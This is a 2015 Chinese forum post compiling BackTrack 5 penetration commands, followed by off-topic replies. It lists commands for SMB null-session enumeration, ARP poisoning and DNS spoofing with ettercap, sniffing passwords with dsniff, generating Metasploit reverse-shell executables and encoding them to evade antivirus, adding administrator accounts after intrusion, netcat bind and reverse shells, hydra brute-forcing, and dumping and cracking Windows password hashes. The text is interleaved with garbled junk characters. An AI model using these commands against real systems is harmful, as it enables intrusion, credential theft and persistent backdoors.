返回列表 发新帖

BT5渗透常用命令整理| →『网络安全区』

344.1k 10
kjeittccdf 发表于 2015-3-28 01:43:00|湖北 | 查看全部 阅读模式
whois 域名/ip 查看域名的详细信息。
* f  @' V+ ^; f
0 H6 }- q8 g; Kping 域名/ip 测试本机到远端主机是否联通。
- ^7 E0 M6 M3 s; i   k- Y4 j5 k' c; l0 J3 H1 ^" k
dig 域名/ip 查看域名解析的详细信息。
+ N% z8 V+ n% T6 _ 0 F: ?0 R; v' m) n+ q+ O
host -l 域名 dns服务器 传输zone。) B/ E, R, Q$ \5 V# y" @4 _' Y' B$ _

4 B! x" u( l! W+ F& ^扫描
# d. w  z/ K; m9 Z  P
3 k- b6 M! H9 P+ `! D; [! pnmap:2 O( o  d4 e; C  l

+ X- r' y! @% P; w5 w1 ^' R/ f# p2 M-sS 半开扫描TCP和SYN扫描。
, m, B- P# n% Y4 m8 X- u2 b + T4 I7 p4 W& I% T4 R6 |
-sT 完全TCP连接扫描。) C) N2 y7 A" C2 \( ^  O& Q4 K
& u8 e5 a% K. P+ q& w
-sU UDP扫描
! D9 q# z" p6 m% Q2 k1 S - u1 Y. s! b* R8 d  U1 J4 e! q
-PS syn包探测(防火墙探测)# P9 l/ E+ y7 |% ~& {9 s9 b+ J
+ ~/ s; x' ^, F3 {2 _, ^) u' ~
-PA ack包探测(防火墙探测)% z# L4 z5 E  n% @  [5 q& P
, h1 H0 F0 ^$ l
-PN 不ping。
/ t7 j9 V. d: y ; ?5 j* \3 z: k
-n 不dns解析。+ K9 L7 ?1 W( b4 z1 W) Z$ }

7 S: q2 u" p' D, D) U-A -O和-sV。
& E7 E% x+ Z2 P1 H ! J: |% O6 \$ z6 D
-O 操作系统识别。
; C! O2 r) B6 U, O, A! r. P$ i% ~2 Z - R# T7 h" z- D( j' a
-sV 服务版本信息(banner)
. B! n  X0 ^4 z- }* I/ V
) f0 T# g3 ~8 U# _-p 端口扫描。# o. j. G( \2 Y

0 y3 _8 Y- f5 w! F8 p9 g-T 设置时间级别(0-5)) ?2 M- g) q4 I' s

; [0 R( ~' Z% V! ~2 [0 H7 Z# O, y-iL 导入扫描结果。
1 x; X2 ]3 {% @ 4 u6 k2 y% T, K+ U6 q
-oG 输出扫描结果。
9 V/ n4 p" X1 g, E8 S ! c: a& A0 [: W, R! @5 {
2 _5 v2 T) B; F1 }
( Q; S/ E' F0 e, u) T+ G, Q
操作系统识别:  o  W4 M/ |+ v, m! O+ I. m: f

2 _9 ]* L& N0 C, Q* y% N: mp0f -i eth0 -U -p 开启混杂模式。* E) Z. d0 {) ~9 Q+ l2 N6 c

# [2 x- T: ~# c3 W0 G  Hxprobe2 ip|域名 检测os。/ B5 i5 f; c3 K% O4 B6 m

. c+ C, s' {# G0 K  |- i9 b' r6 i! _banner获取:
# A# m/ K, v5 J. z7 W! _2 g # p3 E2 ?! \0 ~  {2 Y+ j- `$ N
nc ip port  检测端口是否打开。" J! ?' s8 U! v( _% v5 m8 Y

, A' v1 Z5 x6 Rtelnet ip port  检测端口是否打开。
# H2 m* }5 N/ V* @; |( J 4 X' s) k$ J5 C( f# o: _- v2 r
wget ip  下载主页。* r0 v* e+ h0 q

8 d2 X  _/ R1 k5 `1 \# {: o" ycat index.html | more  显示主页代码。9 p( m/ W4 P1 e' q! H0 r# ^% A
! `1 M( X4 X+ c, r4 K: d
q   退出。
/ ]+ @$ l7 ?. o" G4 O. x8 R: Q2 v
4 E( N1 [8 h# _; Y& ~' uwindows枚举
' H) d9 ^: }8 L& `! F 4 U9 @3 {! J. F8 I
nmap -sS -p 139,445 ip  扫描windows。
7 r) L+ Z- T0 I" D* k# o9 ]$ O& T8 y
% }. g0 a) X/ a# [" A7 ycd /pentest/enumeration/smb-enum 0 S' a2 F: j1 X( u- R

4 O9 ?) `- \+ H/ e. u9 u9 B' inbtscan -f targetIP  检测netbios。7 T+ @' l$ u! b! b5 J

/ D8 _' K' x+ I% vsmbgetserverinfo -i targetIP  扫描name,os,组。7 C, r* I  o, e' t  K! Y

$ q$ ~) M& z+ |+ Ksmbdumpusers -i targetIP  列出用户。% i/ Z$ b0 n5 e" \# w0 ]

, v$ \# W& Y0 H* K8 qsmbclient -L //targetIP  列出共享。
) d* |5 {; P& O
; Q1 s3 n0 _- Q" ^6 [' D. ?$ L使用windows:6 l; ^/ j" J* g! q6 ^2 `

: u4 ]4 c+ `2 I7 |; anet use \\ip\ipc$ "" /u:""  开启空会话。
* G5 U3 Q& f9 f! O
" F% Z$ m' c9 U  D7 U: xnet view \\ip               显示共享信息。* x( A, ~. {# Y& n: L( I

; f7 L7 D0 W9 n4 t3 Q+ r' `smbclient:! N( f# y/ \3 ^4 [& n& Z
  n2 {2 V9 E  S& b! m* [9 P+ }
smbclient -L hostName -I targetIP 枚举共享。2 Q# x) `# ~+ \5 I- y

, Q9 M3 }3 }0 K; Y& Ysmbclient -L hostName/share -U "" 用空用户连接。1 E; @# X8 R& y+ P1 @6 l

; z9 b7 b& F5 G& `smbclient -L hostName -I targetIP -U admin普通用户连接。* g- |3 B, \' f% h, F& y+ d2 L$ Q

; B4 r, Y/ E, V  D+ `# C2 M. mrpcclient: ; S+ a) h8 ^  ?* u

- e9 {8 K5 Q9 _9 srpcclient targetIP -U “”打开一个空会话。
/ L- `4 L% e+ u# _# l& p & K3 o! [0 T! l) Q9 ?1 D
netshareenum  枚举共享。* x& k+ u2 E' t5 @2 p3 n
4 p  t" l. f2 Q, F5 D
enumdomusers  枚举用户。
* K8 T/ k0 ^, |: b/ A% T8 E3 A
- I6 c+ L$ {' [/ a# Z/ hlsaenumsid    枚举域SID。
/ m# \$ Q9 [; _
% h8 ]. L- u: x. Q: }queryuser RID 查询用户信息。
1 p3 e3 f* g; T  r* ?1 ^
% u$ w! U+ C* M! n; d% ucreatedomuser 创建用户访问。
7 o, Y5 b/ Z8 x# v9 r 3 G% O& m2 a6 G3 Q+ M5 M9 @
ARP欺骗:
3 [- w/ f- j+ S% t& H8 e# x
. R" X, Z( u5 r" T' \# v$ y+ k  n9 yettercap:
0 ~1 q8 H- k0 q& g9 s) P
7 R* ]( T# v1 x8 ]nano /usr/local/etc/etter.conf配置文件7 @; m- f4 Q9 `
; n% f" q# l5 j/ H5 X
Sniff > Unified sniffing > Network interface: eth0 > OK  设置抓包的网卡% G# Z" s  M3 c- Q
3 Q* W* G1 l! m, M% j, d5 e
Hosts > Scan for hosts (do this two times)扫描网段的主机
' D& A6 D- [/ m- }& Q
2 n% k- y! R8 KHosts > Hosts list 显示主机列表) m8 z: K7 \0 ~. n! w+ v

1 E$ q2 s6 `4 ~' A. fSelect the default gateway > Add to Target 1 添加主机
4 F( c: y3 R. N' N% f
8 I, A( f7 Q& C2 [) V( SSelect the target > Add to Target 2 添加主机3 m3 Y4 j  }; L% Y+ D
5 D2 S% \0 x$ A  c- P
Mitm > Arp poisoning > Sniff remote connections > OK  设置ARP攻击# A/ A' t- U7 H7 t  f1 b0 c

5 x; A9 z/ n  p' z/ RStart > Start sniffing 开始攻击
& f# i" d: O  k9 Q6 p5 L% _: _! r
' T3 L" C1 I" A/ G0 hdsniff -i eth0 监听网卡窃听登录用户密码
( K3 E" f- l. V' a; g
/ _9 {  Q3 z# p8 _- b& \: Vurlsnarf -i eth0 嗅探http请求9 I  d0 y7 L7 q' n1 O0 A

  z) e( m( v* M( l: E, pmsgsnarf -i eth0 嗅探聊天软件的聊天内容: G  Q/ M& X! d* p& y

( ?  m4 q) r% Z6 R) C( |; `7 \driftnet -i eth0 网络管理嗅探图片,音频。+ U  C+ t" q( d# e! W& W

# e* S$ w1 G+ s7 [4 gnano /usr/local/share/ettercap/etter.dns编辑配置文件6 u% Q5 p" v3 Q; H5 _3 |
) y7 K+ L: ?& q5 J' Y- T
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
! h0 R. m# @2 t( d
1 r& j7 b2 O% F% k  eMitm > Arp poisoning > Sniff remote connections > OK 设置ARP2 D5 b* o; f" `8 b; R5 p

  {( {: I6 U9 o0 `Start > Start sniffing 开始攻击, q; ]1 Z6 {$ r+ t; }
9 k9 g7 I, p# T4 p/ k! p. a
+ w8 j! ?4 Q0 W$ _! s
7 G  S7 |* a/ R( n  y
Exploits漏洞利用:
7 W* {  E& S4 B4 [: s% t
2 q$ t. s+ O! m3 R! N* X) m+ Ucd /pentest/exploits/exploit-db 进入目录
- A% c2 x5 _0 u
. w' f  \7 l( ^, scat sploitlist.txt | grep -i [exploit] 查询需要的漏洞9 a+ s* n# A; m( w- D$ A* q
+ k% ~8 i5 a: ^% \: u" Q& ^( u
cat exploit | grep "#include"检查运行环境5 n8 }" \7 M2 q+ q
- X7 U  e3 @% R2 E; F* o/ O
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码
2 C3 \1 {, v7 @$ v
' |  K; |0 y* E, B2 u: z 8 ?, M, f6 j# L8 w

2 ~2 H! s0 T% O$ M9 Z, ]Metasploit:
' y. I' y, @" ^/ w  f' K
% {% O2 P$ f) O2 f) d7 `; z* W4 x# dsvn update 升级 ) N* P4 L5 p9 Q# u

& `, {( z0 T0 S$ y./msfweb Web接口127.0.0.1:55555。.
. }7 |( v- c& ?7 i# T: f& ^ 1 w: o# K( {8 ]9 w% l
./msfconsole 字符下的Console。- I8 N6 [8 S( C7 X0 f& u0 {* C
/ L* ^3 z8 ]) k
help 帮助
& I4 ~; E) w& ^7 q4 H2 U  n  c 3 W( T. B7 k! H3 Z( K
show <option> 显示选项
& g% a% p- i* I; T5 l9 L+ a 1 e6 P0 k# _* t# v; I
search <name> 搜索名字
2 o; D, H5 y0 i9 {* v, Q
, j6 d9 v# X- n; Z6 f# Xuse <exploit name> 使用漏洞
( b! d( z! n$ D* h : G; G6 i5 N" ]6 P9 v/ h
show options  显示选项5 `& v4 V" m, @9 ~* X: p4 e
' D+ N4 y6 p, M) ?& c$ V7 X
set <OPTION NAME> <option> 设置选项2 p! Z; W7 G6 C3 V  s7 o

4 l8 L: h: y0 c! a1 Y1 ], rshow payloads 显示装置
4 g1 r( I6 m4 h# J* j! s& k
# K+ R9 N3 i% Y, N4 b, bset PAYLOAD <payload name> 设置装置
/ v, k( r4 ^! B
1 s7 J0 V( Z" D2 ?- eshow options  显示选项1 Z5 d6 v1 e1 L7 F+ _9 j8 B' t
$ j  R8 c( `9 O6 s
set <OPTION NAME> <option> 设置选项
+ p$ c) _# c, z: N & j# U2 b( f$ w4 O; n
show targets  显示目标(os版本)+ ~( _! n& o$ g' ?# C7 c* G+ Z, E
  B. @9 v: T7 L
set TARGET <target number> 设置目标版本
' F/ }1 H+ Z7 @; ?$ ^ ) Z, e5 H( Z9 ~+ L+ D( k# A
exploit 开始漏洞攻击( h) C  D: Y) U* u% c  e6 b

% |4 s$ H1 J  @+ isessions -l 列出会话
! x! T& Z% u: L( k3 |/ }
, o& s* O' s5 _5 S( R4 Jsessions -i <ID> 选择会话
) D* j$ Q0 Y* H/ q. _( @ 6 w: ]. V8 I% J/ Q6 e+ Y0 H0 f
sessions -k <ID> 结束会话5 G& ~2 t% g7 ^. p( }$ r
# U) @, g' ]) x* f$ |
<ctrl> z  把会话放到后台
# H" T4 B* t/ D" Z) r " S/ U; V: L: U% ?. v
<ctrl> c  结束会话
7 G" J' E" s) d5 O* ~
5 l6 R/ ~9 I# V8 D8 qjobs   列出漏洞运行工作
: R9 n0 @# p! M, C( B5 S3 a+ o/ o
) X1 a: X1 ^: ?1 U8 ^8 xjobs -K  结束一个漏洞运行工作
/ N* j$ r& C1 D$ f3 R# u& _
$ j. M- n) I' M) ?. x+ x' v4 _show auxiliary 显示辅助模块
* k9 }( h2 R, ^4 u
8 f, R$ v& {* d3 m: z% F- u# }5 kuse <auxiliary name> 使用辅助模块
$ @1 y' r- s! m3 |5 V 9 z& ?1 c# y( D% T
set <OPTION NAME> <option> 设置选项0 T3 x  H/ S8 |! X# Y5 w
  X3 T2 W4 y  l5 S
run  运行模块
+ z# f" ~4 L0 E+ ^7 ` / C- }" J+ G, }$ q; v7 ?! J1 H: O
scanner/smb/version 扫描系统版本+ t1 y, J9 ~' |/ t0 a- ~/ J
4 O! P9 t+ H9 g) V' P
scanner/mssql/mssql_ping 测试mssql是否在线
0 R6 j1 Q# W4 D* T  y# Y6 u
( Z$ N9 T6 X& q6 Gscanner/mssql/mssql_login 测试登录(暴力或字典)
4 n! D& _: F9 `! J4 N. ~
6 A) F( s, {$ j  g4 O3 E  rAttacker behind firewall:  bind shell正向( N2 R9 j7 j4 N% F1 d8 r4 g
. a3 m0 x/ ^3 p$ P
Target behind firewall:  reverse shell反向  |9 a1 E2 E. X$ d

" b) S" n* r, W8 q4 v8 WMeterpreter衔接不懂dos的可以用这个:* c" R, m& y- P; B: r' o
7 \" b: {/ t  n
db_import_nessus_nbe 加载nessus的扫描结果7 u6 U/ x7 P1 K3 V% Z6 o
7 [% N7 [  Y/ W, Q/ p
db_import_nmap_xml 加载nmap的扫描结果, m, M3 M8 {0 M6 f3 Q4 R
. T' L/ S7 \2 l3 O/ z' A: G
自动化攻击流程:! v) u$ V! g) M% `

, L' Y- b; q8 a" ?# F9 C- qcd /pentest/exploit/framework3
8 w$ [  P; {/ g) [  v
9 t, `# r1 R, e0 c& D2 ?./msfconsole) r) b) \9 n2 v' p
$ }' H4 t  Y- _+ q& t
load db_sqlite3) m; U' H$ H; ?3 A; h+ ^; R9 }0 j1 o
. v% r1 |* ~0 p7 q) g
db_destroy pentest: Q% c: J4 Z/ f, h1 a1 p/ m. a
, R0 j9 v2 |4 D" M" L
db_create pentest
; Q9 d1 Z' e" V6 W3 Y- `! M & K( e. l) ~0 ]
db_nmap targetIP4 C  m" D" u% K! Z& A$ u. R8 {! {

9 y! ^1 U9 L7 ^/ }db_hosts/ @7 j1 S3 H! R
: n- I7 t8 s& y! x
db_services2 U3 J% H7 l% y( V& I8 F

3 q6 u/ u. L* ^$ T5 X" ldb_autopwn -t -p -e# w, v! J/ G- w/ ^) `4 t' r
% J( u: j  u$ q0 e0 p6 Z' F
字符接口攻击流程:
; |) W1 k& M; ]3 { 4 I8 d& C4 h% @6 O; \
./msfcli | grep -i <name>8 c$ Y% A9 q! O; l
. L  s* E& x% q0 r
./msfcli <exploit or auxiliary> S$ o/ B' H5 o  r: V/ T

% q1 }) W% d1 ]7 X8 O/ M3 a./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
3 h; w9 f# x* {0 _* A+ k% r, W + n: b: y2 I/ |3 l
做木马后门等:
8 f% ]$ Y5 u! o# q0 E5 z5 _2 z   ^% q4 D( B! C7 _
./msfpayload <payload> <variable=value> <output type>4 q. D. T9 z$ H

& q( l& h( W1 X. Q8 IS        summary and options of payload, ~) x8 S, P( I' W6 v" t3 h
+ |1 O8 h7 f  ?& Q2 G$ K
C        C language3 ]6 N9 w. R7 z! b9 [
7 E: S1 a$ |: Q7 T% r
P        Perl$ n' ?5 s) g. f

( w* |$ D' P. Z/ `* u6 wy         Ruby- B0 }0 t0 _- p- g  b2 j

' k% J4 d& t+ a& xR        Raw, allows payload to be piped into msfencode and other tools
1 O  |0 a% _8 b- `! p/ u : s3 ~# p+ k0 b, I# k- O
J         JavaScript
4 ]  x& y# \* t; g5 I, i
% F9 X$ w. \; B3 |8 E6 {/ kX        Windows executable
. C: Y  m9 t7 Z; b: v( H2 T) I / X5 V& L7 U) ^3 p3 B' U  P
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
5 F/ s. H0 c: x( e6 Z7 r' U- q) K 7 ~3 F) f% D0 ?
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
3 H' e; ^8 {8 y; Q. [ ( U, I; q. s$ a) _+ L& A3 u* t5 V3 o
编码处理就是做免杀:0 _" N6 Q6 Y3 H& c

6 ^/ `* n) J) P7 D3 ~; [./msfencode <options> <variable=value>
0 O* Z. v' S7 R( Z, I6 D
0 b7 n9 ~1 z* w. K$ r$ u( L./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -l
/ R2 _) M; N4 ^; @2 s " m% v, e6 a) g8 e* D+ d
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -e PexFnstenvMor -t c" n" R3 v1 Z$ @: o% p

+ ?" `3 U2 ]" w# o1 I& o, y0 N
9 q# L" {% Q# G: g3 w
! |! {/ h: `5 P0 q入侵后在windows下添加管理员用户:% }  a( Q1 r' C0 H1 O
: o! B* ]. Y! ]  F$ |2 H7 M6 ]* ~
hostname 查看主机名
$ P9 O" n9 y0 S+ n
& E: U+ J# o" m( w3 Z4 _4 enet users 查看用户
. `, w9 P; g! o8 ^1 g# y% ] 9 _5 W! }1 v8 t$ W' J1 K
net user 用户 密码 /add 添加用户
( J' Y  i# Q& h# Q& V& W9 |
1 S3 t4 {2 j& w# Q! Z; w+ snet localgroup 查看工作组
; ~) b7 @6 g% E6 F0 z 9 j' n3 h( h2 }+ P3 v* ~; ]
net localgroup administrators 查看管理员组
7 \' r1 z/ V2 p, [& R
2 b: H3 z9 q8 u( @8 _net localgroup administrators x /add 将用户加入管理员组
! y8 r! q% c! ~: S+ V5 c3 p8 O
: ]8 _! F2 j- F
! W# d" `) d; V" R# j( t& E
- B* y5 r/ D2 qTFTP
$ B  E6 R1 ~  D" v  N! x
5 f3 u3 }& g! w) s# rcp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上2 @3 G6 x2 D' z# `. j) n

/ w$ @: p. o( Y" G  n# m, Ttftp -i 10.1.1.2 GET nc.exe下载
+ N7 c) h* p: {& U1 h+ |3 j# p& i$ Z 7 r/ r/ _  ~- u9 b" G( P, y
netcat瑞士军刀7 G) J1 ~0 P6 Y5 i

( X; n7 ]# ]/ Q/ |: Uattacker:  10.1.1.1
  ~+ j, N) y  b0 Z6 d) ^
. ^# r, X  {, y! S" j; l, jtarget:  10.1.1.2# D& \0 N# U+ Z/ Z& d" f- C7 q
+ Y; L* P# I( i9 \
nc -v -z 10.1.1.2 1-1024 端口扫描
' B) y3 Q- S+ ?) V
8 B! ?6 g/ |7 {/ d$ r9 ]target:  nc -lvp 4444 聊天设置(服务)
  c  R+ o8 j/ h& Q4 e& k  C 0 |! Q; r7 I. j
attacker:  nc -v 10.1.1.2 4444 聊天设置(客户): G4 A/ m6 y* m7 G5 V$ l% W* ~
/ O7 ?& G+ x0 }% i- _) D
target:  nc -lvp 4444 > output.txt传输文件(接受)
$ h3 K' I% }) ^) o" h   i; j# d7 R, M; ~/ z" k
attacker:  nc -v 10.1.1.2 4444 < test.txt传输文件(发送)6 T/ r4 a7 v/ Z) A/ d" Z

0 `! V' ?& {2 N9 ^/ H0 Y3 Ctarget:  nc -lvp 4444 -e cmd.exe  Bind shell。
  a6 P0 F4 o! B% }, a - ]. W0 V" w$ v3 t1 P' Y& p: w
attacker:  nc -v 10.1.1.2 44448 j5 u. e  m% T: }8 r8 }. s+ Q% x- U2 `* K

5 l3 m* x$ h- A' F/ g5 @target:nc -lvp 4444  Reverse shell。
# k& g7 j$ E0 B7 u% @; l: Z* |
( N% }/ c# W( B# \7 Dattacker:nc -v 10.1.1.2 4444 -e /bin/bash: a/ J) F% H$ |. s# v0 s, M

8 R: W7 A7 S2 o/ @. f
3 [5 M# O0 ]. n4 y$ {) B
; s$ e4 h8 d' g; b密码$ x: I# O/ ^# w0 Q7 l

$ E. m5 w5 Z/ B: V, I字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
" f2 |7 r- s3 q. g 7 D/ ?" _4 M" l% z
cat words | wc -l显示个数(30多万个)     ; s% I8 d) z3 b- u$ c- @" ^
* O, X6 B0 }  a5 o, d2 ?' Y
暴力:8 z. E. I8 Q# E4 |, B' D
" C/ ]/ I( W* H7 @7 l: ?+ l1 E8 W
hydra -l ftp -P words -v targetIP ftp 攻击ftp。; F8 A7 Y. S4 G8 K3 |% b
  p9 L% p  o) {! S  `* G
hydra -l muts -P words -v targetIP pop3 攻击pop3% P4 _" {9 E  c* a  w+ }* j+ x' y( A8 Q

+ {7 ^7 \) J" B& chydra -P words -v targetIP snmp 攻击snmp( F' p( ]/ V! E' C1 L

! M& S2 r) G3 R7 D攻击microsof VPN) J8 o# ~+ f7 G; C

, U4 A4 v# @  y! D6 I1 Rnmap -p 1723 targetIP
8 c$ U  Z) E, ^5 E! i- |; q: u: l + C- X* K* J: `# u) I
dos2unix words
7 Y) G" w/ L% v. ~/ F ; u. _1 Y9 w; v: z5 K! B$ F
cat words | thc-pptp-bruter targetIP
/ W9 {2 q2 A; D  X; \
* L6 `- \& t1 I+ ~* a. x- GWYD:
" h: B8 H7 p" X! D / q9 k$ `8 @; ?
wget -r www.target.com --accept=pdf 下载pdf文档, E, _* w) l+ J

, }3 I% e4 A0 ewyd.pl -o output.txt www.target.com/
% J2 O( Y5 x" V
" ~. j5 m' E/ v4 Z4 c: Gcat output.txt | more# t# M* G1 F2 e) T& k

# A) U& t; h3 R* o) XSAM文件(windows下的密码文件):
# U  I: h8 V/ C: P5 r ! D- u8 w. \* U' p
%SYSTEMROOT%/system32/config
$ T7 _0 P- Y5 m3 ^' f4 @* y
1 T7 Y: {; {, U! T8 w$ @. d, P+ p%SYSTEMROOT%/repair
& c! m5 t3 X) t" r
: f4 Z/ N, y5 P: n* G7 I0 i; H备份windows的hash文件:$ Z' d1 B6 I( \6 E1 I
  p" m! h6 v# ?! M; G8 L$ s  M5 |
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E- l( A7 _4 r( q9 g! m1 {! ^
  |' m  ^$ C4 {$ {) [! j# G
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\5 ]9 {6 {7 x$ B8 @1 I) S; a
* U  E$ T0 b% m* U$ I; c
meterpreter > execute -f cmd -c
5 X& c" x! }/ D# Y/ f9 w/ _" } $ K' R) I8 D8 {$ Z- H
meterpreter > interact x
8 ^' {# _$ p6 z! _. U1 _, z ; ~% ~2 l( X" ~3 {; O
C:\WINDOWS\system32> pwdump \\127.0.0.16 ^0 E* S* I5 Y$ G4 K
  Y) C% K( E# Y) H- X# X
john破解密码:( C$ |- V0 F# R7 s
9 g- }4 y5 _' n5 l( Z4 N' |, T( a1 |
cp hash.txt /pentest/password/john-1.7.2/run/
; v0 W! G! [% v. L
/ j7 H! v: b6 X: I5 S( Qcd /pentest/password/john-1.7.2/run/% ~: F; n$ g* z# G  w
1 S& B+ H# G/ P$ N) k
./john hash.txt; a; \/ A. e1 e* u* _
4 k+ u7 Q7 @7 N1 s  C* s
彩虹表:) h9 J) X7 o- C0 U% m

$ A: `, n7 h  f3 m- n& e7 q; u; G0 Mrcrack *.rt -f hash.txt/ d2 j3 N( u8 m  f* J3 y! @
. j) a: m( x7 V4 w
+ r& ]7 P" T' n8 o

% Q3 [! g8 V' \( y+ k  |, \8 b' ~本地修改密码:& E! G# ]1 \( F$ I; U3 Z9 P

' b0 U6 H6 D6 mmount9 L" _8 O" o4 i

# ^# R# m( d0 @2 z1 I' j3 T. v$ _* ~umount /mnt/hda18 w& u7 x5 q9 U

1 C# \( b8 L1 ~- D4 M& qmodprobe fuse
" K: v' V" N5 _! Y7 s . R6 x0 `0 t- P% G1 Q! P
ntfsmount /dev/hda1 /mnt/hda1
. v7 b. }0 n, r5 Z 6 y6 b) x/ d0 i% s; J
mount

回复|共 10 个

亮凌庚 Lv.15 发表于 2015-6-23 22:00:05|日本 | 查看全部
哈 你逗逗他啊
kwjvtwzx Lv.15 发表于 2015-6-23 22:00:51|湖北 | 查看全部
baidu是相当能折腾我了
efiew Lv.15 发表于 2015-6-23 22:07:09|法国 | 查看全部
挨骂也是幸福~~~
swmozowtfl Lv.18 发表于 2015-6-23 22:08:57|德国 | 查看全部
我怎么就踩不死你呢??
xiaoye Lv.9 发表于 2015-6-23 22:24:12|日本 | 查看全部
本人过去、现在以及将来都不认识楼主,且自古以来与楼主无利益关系。楼主表述之事与本人无关
gevaemaidovef 发表于 2015-7-25 18:00:25|美国 | 查看全部
哦...这个...偶昨天就看了....
bqtklouu 发表于 2015-7-25 18:15:57|Reserved | 查看全部
楼猪.重量级人物阿.
wwdu926a 发表于 2015-7-25 18:16:58|INNA | 查看全部
嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````
buingeEvineus 发表于 2015-7-25 18:20:08|哥伦比亚 | 查看全部
好吧...那你说...
kpasd Lv.3 发表于 2015-8-28 22:40:30|山东 | 查看全部
谢谢了。。。 我很赞成,继续努力吧% N" d7 H" x; V+ G" r4 E
; i! l9 ^- p4 y0 }: U) Z& \" y

7 D7 ~" X9 h# y6 M* F
! [. H+ I+ B5 [! p9 b( W  t; q$ i; I8 p- L3 ~' T. m" |1 y4 W
  K# h6 B# x" |' g
) |0 i0 v) G( S* G# h
1 o; n2 G; {. ~

3 J( ^% ?: e: Z% ~1 y
$ c6 e$ ^3 N2 T5 p+ `
* B0 b4 t  N/ X# s
) J: c; \5 a, k% r1 u: v& s0 G

% r! O" h- w5 p& D# t2 ^                               
登录/注册后可看大图

3 r& g$ v8 [7 \3 I9 D( b
# l# s9 Q5 D3 P5 I
                               
登录/注册后可看大图

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 得知互动-专注Ai与站长技术交流社区-Ai交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表